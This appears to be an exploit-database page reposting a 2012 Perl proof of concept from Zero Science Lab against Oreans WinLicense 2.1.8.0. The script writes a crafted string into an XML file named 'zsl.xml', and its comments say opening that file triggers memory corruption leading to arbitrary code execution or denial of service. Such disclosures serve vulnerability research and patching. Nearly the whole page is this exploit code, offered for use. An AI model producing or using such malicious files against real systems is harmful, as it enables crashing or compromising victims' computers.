Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption



EKU-ID: 1726 CVE: OSVDB-ID:
Author: LiquidWorm Published: 2012-03-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl
#
#
# Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption
#
#
# Vendor: Oreans Technologies
# Product web page: http://www.oreans.com
# Affected version: 2.1.8.0 (32/64bit)
#
# Summary: WinLicense combines the same protection-level as Themida with the
# power of advanced license control, offering the most powerful and flexible
# technology that allows developers to securely distribute trial and registered
# versions of their applications.
#
# Desc: WinLicense is prone to an unspecified memory corruption vulnerability.
# An attacker can exploit this issue by tricking a victim into opening a malicious
# XML file to execute arbitrary code and to cause denial-of-service conditions.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN) (32bit)
#            Microsoft Windows 7 Ultimate SP1 (EN) (64bit)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2012-5080
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5080.php
#
#
# 20.03.2012
#
#
use strict;
my $file = "zsl.xml";
my $hit = "Joxy-\\x\\-Poxy";
print "\n\n[*] Creating $file file...\n";
open ZSL, ">./$file" || die "\nCan't open $file: $!";
print ZSL $hit;
print "\n[.] File successfully mounted!\n\n";
close ZSL;